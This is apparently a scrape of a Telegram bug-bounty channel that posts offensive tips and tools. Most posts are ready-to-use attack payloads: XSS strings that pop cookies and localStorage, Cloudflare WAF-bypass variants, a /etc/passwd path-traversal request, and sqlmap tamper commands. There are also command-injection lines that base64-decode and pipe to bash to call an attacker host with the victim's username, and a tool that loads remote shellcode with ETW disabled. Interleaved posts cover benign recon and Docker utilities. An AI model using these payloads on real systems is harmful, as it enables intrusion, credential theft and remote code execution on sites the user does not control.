Parameter: invitedby=
Payload=
Full_url=
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload=
%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3EFull_url=
https://site. com/?invitedby=%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3E#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3❤1👍1
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|noscript|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' | xsschecker -match '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' -vulnBugCod3 ( ZIP )LearnExploit ( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡2❤2
#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡2❤1🤣1
This media is not supported in your browser
VIEW IN TELEGRAM
🕵️♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py
BugCod3#Python #Osint #Search #Engin #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥3❤2👍1
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1👍1
Tools to automate finding AppDomain hijacks and generating payloads from shellcode.
Run this tool on the target. It will search recursively in the
C:\ directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.AutoDomainHijack.exe (--version | -h | --help)
-t, --target-name=<target-name> Name of the target managed .exe to hijack.
-n, --hijack-name=<hijack-name> Name of the hijacker .dll.
-u, --url=<url> URL of the remote shellcode to run.
-f, --file=<file> File containing the shellcode to embed.
-o, --output=<output> Full directory to write files to.
-e, --etw=<etw> Disable ETW. [default: true]
--version Prints version
-h, --help Show help message
nimble build
BugCod3#Hijack #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1❤🔥1🤣1
MultCheck is a malware-analysis tool that can be used to test the detection of a file by multiple AV engines.
It is designed to be easy to use, and to be able to test multiple AV engines. It is also designed to be easy to extend, and to be able to add custom AV engines.
Run
go build under the root directory of the project.OR
cd src
# Build for Windows
## 64-bit
GOOS=windows GOARCH=amd64 go build -o ../bin/multcheck_x64.exe main.go
## 32-bit
GOOS=windows GOARCH=386 go build -o ../bin/multcheck_x32.exe main.go
MultCheck accepts a target file as an argument:
./multcheck <target_file>Different built-in scanners can be used by specifying the
-scanner flag: ./multcheck -scanner <scanner_name> <target_file>Custom scanners can be added by creating a configuration file and providing the path to the file through the
-scanner flag: ./multcheck -scanner <path_to_config_file> <target_file>BugCod3#GO #Malware #Analysis #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3⚡2🔥2
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
#BugBounty #Tips #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload :
'%3e%3cnoscript%3ealert(5*5)%3c%2fnoscript%3eejj4sbx5w4o#BugBounty #Tips #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10⚡2❤1
CloudFlare Payload
#Payload #Cloudflare #Pentest
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/A3l3_KA4
<noscript%0Aonauxclick=0;[1].some(confirm)//<noscript onload=alert%26%230000000040"")><noscript onx=() onload=(confirm)(1)><noscript onx=() onload=(confirm)(document.cookie)><noscript onx=() onload=(confirm)(JSON.stringify(localStorage))>#Payload #Cloudflare #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥3⚡2👍1
Advanced SQL Injection for AWAE
Goal is to master SQL Injection Discovery, Detection and Exploitation
📊 Table of Content:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
- The Alternative ways of using
- The Alternative way of using
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
😸 Github
⬇️ Download
🔒
#Sql #Injection #AWAE
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Goal is to master SQL Injection Discovery, Detection and Exploitation
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
AND/OR 0 in SQLi- The Alternative ways of using
NULL in SQLi- The Alternative way of using
WhiteSpace in SQLi- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
BugCod3#Sql #Injection #AWAE
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2❤1👍1
The part of the PoC that must be encoded. This is how it is done if you haven't found a way to do it yet.
#PoC #Pyaload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd#PoC #Pyaload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
lazydocker
💬
A simple terminal UI for both docker and docker-compose, written in Go with the gocui library.
📂 Requirements:
⚪️ Docker >= 1.13 (API >= 1.25)
⚪️ Docker-Compose >= 1.23.2 (optional)
🔼 Installation:
OR
⚪️ Required Go Version >= 1.19
💻 Usage:
⚪️ Basic video tutorial here.
⚪️ List of keybindings here.
📊 Features:
⚪️ viewing the state of your docker or docker-compose container environment at a glance
⚪️ viewing logs for a container/service
⚪️ viewing ascii graphs of your containers' metrics so that you can not only feel but also look like a developer
⚪️ customising those graphs to measure nearly any metric you want
⚪️ attaching to a container/service
⚪️ restarting/removing/rebuilding containers/services
⚪️ viewing the ancestor layers of a given image
⚪️ pruning containers, images, or volumes that are hogging up disk space
😸 Github
⬇️ Download
🔒
#Manage #Docker
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
A simple terminal UI for both docker and docker-compose, written in Go with the gocui library.
curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/noscripts/install_update_linux.sh | bash
OR
go install github.com/jesseduffield/lazydocker@latest
echo "alias lzd='lazydocker'" >> ~/.zshrc
BugCod3#Manage #Docker
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3⚡2🔥2❤1
OS Command Injection ⚔️
#InfoSec #CyberSec #BugBounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
curl${IFS}$(whoami).atckrecho${IFS}Y3VybCBodHRwOi8vdTBfYTIxNS1sb2NhbGhvc3QuYXR0YWNrZXIK|base64${IFS}-d|bashcurl${IFS}atckr?$(whoami)echo${IFS}Y3VybCBodHRwOi8vYXR0YWNrZXI/dTBfYTIxNT1sb2NhbGhvc3QK|base64${IFS}-d|bash#InfoSec #CyberSec #BugBounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1🎃1
The State of Modern Attack Surfaces
👩💻 Google Drive
⬇️ Download
#Nahamcon #Bypass #WAF
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Nahamcon #Bypass #WAF
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡2🔥2
If you find sql injection and encounter a 403 or waf block, be sure to try tamper noscripts and update your sqlmap
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2👍2🔥2❤🔥1❤1
Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.
🌎 Blog
#ATM #Malware #News
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#ATM #Malware #News
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
CNEXT exploits
💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
👁🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:
⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...
🗝 Exploits:
Exploits will become available as blogposts come out.
⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...
😸 Github
⬇️ Download
🔒
#CVE #Exploit #Cnext
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
The vulnerability and exploits are described in the following blogposts:
Exploits will become available as blogposts come out.
BugCod3#CVE #Exploit #Cnext
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
DOMAINIM
💬
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
📊 Features:
⚪️ Subdomain enumeration (2 engines + bruteforcing)
⚪️ User-friendly output
⚪️ Resolving A records (IPv4)
⚪️ Virtual hostname enumeration
⚪️ Reverse DNS lookup
⚪️ Detects wildcard subdomains (for bruteforcing)
⚪️ Basic TCP port scanning
⚪️ Subdomains are accepted as input
⚪️ Export results to JSON file
🔼 Installation:
💻 Usage:
📂 Examples:
⚪️
⚪️
⚪️
⚪️
⚪️
😸 Github
⬇️ Download
🔒
#Pentest #RedTeam #Tools
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
cd domainim
nimble build
./domainim <domain> [--ports=<ports>]
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
./domainim nmap.org --ports=all./domainim google.com --ports=none --dns=8.8.8.8#53./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1BugCod3#Pentest #RedTeam #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1👍1
GAP Burp Extension
💬
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
🔼 Installation:
⚪️ Visit Jython Offical Site, and download the latest stand alone JAR file, e.g.
⚪️ Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
⚪️ On a command line, go to the directory where the jar file is and run
⚪️ Download the
⚪️ nstall Jython modules by running
⚪️ Go to the Extensions -> Installed and click Add under Burp Extensions.
⚪️ Select Extension type of Python and select the GAP.py file.
💻 Using:
⚪️ Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP
⚪️ you can right click a request or response in any other context and select GAP from the Extensions menu.
😸 Github
⬇️ Download
🔒
#BurpSuite #Extensions
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
jython-standalone-2.7.3.jar.java -jar jython-standalone-2.7.3.jar -m ensurepip.GAP.py and requirements.txt from this project and place in the same directory.java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.BugCod3#BurpSuite #Extensions
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1👍1
LazyEgg - Hunting JS Files
#BugBounty #Tips #CyberSec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'#BugBounty #Tips #CyberSec
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
Cross Site Scripting Xss Payload
Payload:
#XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--#XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1